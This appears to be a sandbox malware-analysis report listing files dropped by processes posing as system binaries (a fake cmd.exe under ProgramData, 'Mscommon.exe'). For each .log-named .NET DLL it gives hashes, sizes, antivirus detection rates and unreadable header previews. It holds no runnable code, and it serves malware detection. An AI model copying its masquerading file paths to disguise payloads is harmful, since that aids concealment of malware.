SSDEEP:	3:uL0Jwj4Sn:uI8F
MD5:	C92A44AE7E7A77B740DB582AA4D70386
SHA1:	03E4415474E6F1DC92E6FFD9B108BEDED25AE360
SHA-256:	56CC2D4ECF36BD9BB480F2DAE24647F5B8B0FE19E7D885600A5A16D56AE6E46D
SHA-512:	62BA9E340E9626CA34DE895F2405A3E3E017E425C5E3B9ABDBCC065E37F58D431250EBDDB701874EAB5A4F5EE8FCEEBF24FD69767F1F3FC418C1251DC627385A
Malicious:	false
Preview:	znw3fTCV2z5lReF9zEEaQNxUB

C:\Users\user\AppData\Local\Temp\xu1yHoHXYs

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\AEzAQzJw.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BjUpXdep.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BpLaswaY.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CXEIeahW.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FrRytwYk.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GTFZlGXP.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JVsHHpbK.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JmTPAbOe.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KAZQIQEM.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\KVMxlGUc.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\LSnFHGjW.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NDzgjDBy.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PIewODkQ.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QCZpVjcx.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\RCtfAzVO.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\RTAxOVPQ.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\RrReMzQm.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SIrnFmDG.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\SzUnVzkJ.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TnEFcwnq.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
